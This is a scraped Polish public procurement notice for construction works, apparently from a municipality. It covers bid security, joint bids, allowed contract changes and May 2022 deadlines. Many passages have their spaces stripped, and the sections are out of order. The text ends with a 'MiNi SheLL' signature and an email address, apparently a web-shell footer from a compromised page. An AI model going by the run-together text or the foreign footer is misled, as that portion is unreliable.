Złożenie wniosku o zwrot wadium, o którym mowa w pkt. 24.7, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej. <br/>10.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. <br/>11.	Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>12.	Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w okolicznościach wskazanych w art. 98 ust. 6 ustawy PZP.<br/>13.	W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia mogą być:<br/>a) wspólnicy spółki cywilnej – w rozumieniu przepisów art. 860-875 KC,<br/>b) Wykonawcy, którzy zawarli porozumienie w celu wspólnego ubiegania się o udzielenie zamówienia publicznego, nie będący spółką cywilną w rozumieniu przepisów KC np.: tak zwane „konsorcjum”<br/>dwóch lub więcej podmiotów gospodarczych,<br/>2) w takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania, w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego,<br/>3) dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania; - pełnomocnictwo winno być podpisane przez wszystkich tych Wykonawców ubiegających się wspólnie o zamówienie<br/>publiczne, którzy ustanawiają pełnomocnika; - podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do centralnej<br/>ewidencji i informacji o działalności gospodarczej,<br/>4) oferta winna być podpisana przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub upoważnionego pełnomocnika,<br/>5) W przypadku wyboru, jako najkorzystniejszej, oferty składanej przez Wykonawców wspólnie ubiegających się o zamówienie, Wykonawcy, na żądanie Zamawiającego, zobowiązani są przed<br/>podpisaniem umowy, przedstawić Zamawiającemu umowę regulującą współpracę tych Wykonawców, zawierającą w szczególności:<br/>a) wskazania reguł ponoszenia odpowiedzialności przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>b) wskazania podmiotu, który będzie wystawcą faktury w ramach realizacji zamówienia,<br/>c) wskazania podmiotu, który będzie ich reprezentował w stosunkach zewnętrznych,<br/>d) zapis, z którego wynika, że umowa regulująca współpracę tych Wykonawców nie może zostać rozwiązana przed zakończeniem realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający,wszczególnościwoparciuoart.455ust.1pkt1ustawyPzp,dopuszczamożliwośćwprowadzeniazmianytreściumowy,wstosunkudotreścioferty,napodstawiektórejdokonanowyboruwykonawcy,wszczególnościwzakresie:<br/>1)	zmianyterminukońcowegowprzypadku:<br/>a)	nieterminowegoprzekazaniaterenubudowy,<br/>b)	wystąpieniasiływyższej,<br/>c)	wyjątkowoniesprzyjającychwarunkówatmosferycznychtj.długotrwałe,trwającenieprzerwaniepoprzezokres,conajmniej3dni:mrozyponiżej-3stopniC,ponadnormoweopadyśniegu,ulewnedeszcze,wysokietemperaturypowyżej30stopniC;-uniemożliwiającychprowadzenierobótbudowlanych,zzachowaniemwymaganejtechnologii,przeprowadzeniepróbisprawdzeń,dokonywanieodbiorów,<br/>d)	koniecznościwykonaniarobótnieprzewidzianychwpostępowaniuoudzieleniezamówieniapublicznego,apolegającychnapodniesieniuwarunkówużytkowychobiektu,zmianiefunkcji,podniesieniajakościwykończenialubwyposażenia,wprowadzeniuzmianpolegającychnaobniżeniukosztuobiektubudowlanego,<br/>e)	związkuzokolicznościaminiemającymizwiązkuzprowadzonymirobotamibudowlanymi,awynikającymizprowadzonejprzezinwestoradziałalności,<br/>f)	przedłużeniaproceduryudzieleniaprzedmiotowegozamówieniapublicznegopoprzezśrodkiochronyprawnejwykorzystywaneprzezwykonawcówlubinnepodmiotyprzedzawarciemumowy,gdyterminzakończeniarobótokreślonyzostałdatą,<br/>g)	napotkaniawarunkówfizycznychnieprzewidywalnych,mającychwpływnawydłużenieprocesuinwestycyjnego,zmianrobótbudowlanychwprowadzonychdecyzjamiadministracyjnymiwydanymi,lubktóreuzyskaływalorostatecznościpodniurozstrzygnięciapostępowaniaskutkującegopodpisaniemniniejszejumowyidotyczącymistronumowy,obiektubudowlanego,prowadzonychrobótbudowlanychlubinnychokolicznościmającychzwiązekzprzedmiotemumowy,<br/>h)	zmianyzakresurobótprzezinwestoralubkoniecznościwykonaniainnychrobótdodatkowych(zamiennych),<br/>i)	zmianspowodowanychnieprzewidzianymiwdokumentacjiprojektowejispecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanychwarunkamigeologicznymi,archeologicznymilubterenowymi,wszczególności:niewypałyiniewybuchy,wykopaliskaarcheologiczne,<br/>j)	odmiennychodprzyjętychwdokumentacjiprojektowejwarunkówgeologicznych,aleistotnychdlarealizacjiprzedmiotuzamówienia,<br/>k)	odmiennych(aleistotnychdlarealizacjiprzedmiotuzamówienia)odprzyjętychwdokumentacjiprojektowejwarunkówterenowych,wszczególnościistnieniepodziemnychsieci,instalacji,urządzeńlubniezinwentaryzowanychalbobłędniezinwentaryzowanychobiektówbudowlanych(bunkry,fundamenty,ścianyszczelne,itp.),<br/>l)	zmianysposobuwykonaniaprzedmiotuumowynaskutekwystąpieniaokolicznościprzewidzianychwpkt.3.<br/>-podwarunkiempodpisaniaprzezstronyporozumieniawsprawiezmianyterminu.<br/>2)	aktualizacjiharmonogramupracwmiarępotrzeb,zzachowaniemterminukońcowego,októrymmowaw§2ust.1umowy,zuwzględnieniempostanowień§19ust.5umowy(jeżelidotyczy),<br/>3)	sposobuwykonaniaprzedmiotuumowy,wprzypadku:<br/>a)	stwierdzeniawadlubwprowadzeniazmianwdokumentacjiprojektowej,skutkującychkoniecznościądokonaniapopraweklubuzupełnień,którychniemożnabyłowcześniejprzewidzieć,<br/>b)	niedostępnościnarynkumateriałówluburządzeńwskazanychwdokumentacjiprojektowejlubspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanychspowodowanejzaprzestaniemprodukcjilubwycofaniemzrynkutychmateriałówluburządzeń,<br/>c)	pojawieniasięnarynkumateriałówluburządzeńnowszejgeneracji,pozwalającychnazaoszczędzeniekosztówrealizacjiprzedmiotuumowylubkosztóweksploatacjiwykonanegoprzedmiotuumowy,lubumożliwiającychuzyskanielepszejjakościrobót,<br/>d)	pojawieniasięnowszejtechnologiiwykonaniazaprojektowanychrobót,pozwalającejnazaoszczędzenieczasurealizacjiprzedmiotuumowylubkosztówwykonywanychprac,jakrównieżkosztóweksploatacjiwykonanegoprzedmiotuumowy,<br/>e)	celowościlubkoniecznościzrealizowaniaprzedmiotuumowyprzyzastosowaniuinnychrozwiązańtechnicznych/technologicznychniżwskazanewdokumentacjiprojektowejlubspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,wynikającejzokoliczności,którychniemożnabyłoprzewidzieć, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-26 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.platformazakupowa.pl/pn/ug_luzino/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-26 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> f)wystąpieniawarunkówterenowychodbiegającychwsposóbistotnyodprzyjętychwdokumentacjiprojektowej,wszczególnościbrakuzinwentaryzowaniaobiektówbudowlanychlubzinwentaryzowaniaobiektówbudowlanychwsposóbwadliwy,<br/>g)wystąpieniakoniecznościzrealizowaniaprzedmiotuumowyprzyzastosowaniuodmiennychrozwiązańtechnicznych,technologicznychlubmateriałowychniżwskazanowdokumentacjiprojektowej,zewzględunazmianyobowiązującegoprawa,<br/>h)wystąpienianiebezpieczeństwakolizjizinwestycjamiplanowanymilubrównolegleprowadzonymiprzezinnepodmiotywzakresieniezbędnymdouniknięcialubusunięciatychkolizji,<br/>i)podjęciaprzezosobytrzeciedziałańuniemożliwiającychlubutrudniającychwykonanieprzedmiotuumowywsposóbprzewidzianywdokumentacjiprojektowejlubwspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,któretodziałanianiesąkonsekwencjąwinyktórejkolwiekzestronumowy,<br/>4)zakresuprzedmiotuumowywprzypadku:<br/>a)podjęciaprzezosobytrzeciedziałańuniemożliwiającychlubutrudniającychwykonanieprzedmiotuumowywzakresieprzewidzianymwdokumentacjiprojektowejlubwspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,któretodziałanianiesąkonsekwencjąwinyktórejkolwiekzestronumowy,<br/>b)rezygnacjiprzezZamawiającegozwykonaniaczęściprzedmiotuumowywrazieuznaniaichwykonaniazazbędne,czegoniemożnabyłowcześniejprzewidzieć,<br/>c)	wykonanianieprzewidzianychrobótniezbędnychdorealizacjiprzedmiotuumowy,<br/>5)	zmianywysokościwynagrodzenianależnegoWykonawcy,wprzypadkuzmiany:<br/>a)	wysokościpodatkuodtowarówiusługorazpodatkuakcyzowego,<br/>b)wysokościminimalnegowynagrodzeniazapracęalbowysokościminimalnejstawkigodzinowej,ustalonychnapodstawieustawyzdnia10października2002r.ominimalnymwynagrodzeniuzapracę,<br/>c)zasadpodleganiaubezpieczeniomspołecznymlububezpieczeniuzdrowotnemulubwysokościstawkiskładkinaubezpieczeniaspołecznelubzdrowotne,<br/>d)zasadgromadzeniaiwysokościwpłatdopracowniczychplanówkapitałowych,októrychmowawustawiezdnia4października2018r.opracowniczychplanachkapitałowych(Dz.U.z2020r.poz.1342zezm.),<br/>-jeżelizmianytebędąmiaływpływnakosztywykonaniazamówieniaprzezWykonawcę;-wprzypadku,októrymmowawlit.b,cid,Wykonawca,wterminie30dnioddniawejściawżycieprzepisówdokonującychtychzmian,zobowiązanyjestprzedstawić,wformiepisemnej,wniosekuzasadniającyzwiększeniewynagrodzenia,<br/>e)naskuteksytuacjiniemożliwychdoprzewidzeniawmomenciepodpisywaniaumowy,októrychmowaw§1ust.5,6,7,8niniejszejumowy,<br/>6)zamianylubwprowadzenianowychpodwykonawców,podwarunkiemuzyskaniazgodyZamawiającego,nazasadachokreślonychwumowie,<br/>7)zmianyformyzabezpieczenianawniosekWykonawcy,zgodniezustawąPzp,podwarunkiemzachowaniaciągłościzabezpieczeniaibezzmniejszeniajegowartości,8)zmianydanychWykonawcynp.zmianasiedziby,adresu,nazwy(bezzmianysamegoWykonawcy),<br/>Ciąg dalszy sekcji V ZpostępowaniaoudzieleniezamówieniapublicznegowykluczasięWykonawców,wstosunkudoktórychzachodziktórakolwiekzokolicznościwskazanychwart.7ust.1ustawyzdnia13kwietnia2022r.oszczególnychrozwiązaniachwzakresieprzeciwdziałaniawspieraniuagresjinaUkrainęorazsłużącychochroniebezpieczeństwanarodowego:<br/>1)wymienionychwwykazachokreślonychwrozporządzeniu765/2006irozporządzeniu269/2014albowpisanychnalistęnapodstawiedecyzjiwsprawiewpisunalistęrozstrzygającejozastosowaniuśrodka,októrymmowawart.1pkt3;<br/>2)którychbeneficjentemrzeczywistymwrozumieniuustawyzdnia1marca2018r.oprzeciwdziałaniupraniupieniędzyorazfinansowaniuterroryzmu(Dz.U.z2022r.poz.593i655)jestosobawymienionawwykazachokreślonychwrozporządzeniu765/2006irozporządzeniu269/2014albowpisananalistęlubbędącatakimbeneficjentemrzeczywistymoddnia24lutego2022r.,oilezostaławpisananalistęnapodstawiedecyzjiwsprawiewpisunalistęrozstrzygającejozastosowaniuśrodka,októrymmowawart.1pkt3;<br/>3)którychjednostkądominującąwrozumieniuart.3ust.1pkt37ustawyzdnia29września1994r.orachunkowości(Dz.U.z2021r.poz.217zpóźn.zm.)jestpodmiotwymienionywwykazachokreślonychwrozporządzeniu765/2006irozporządzeniu269/2014albowpisanynalistęlubbędącytakąjednostkądominującąoddnia24lutego2022r.,oilezostałwpisanynalistęnapodstawiedecyzjiwsprawiewpisunalistęrozstrzygającejozastosowaniuśrodka,októrymmowawart.1pkt3.

Creat By MiNi SheLL
Email: jattceo@gmail.com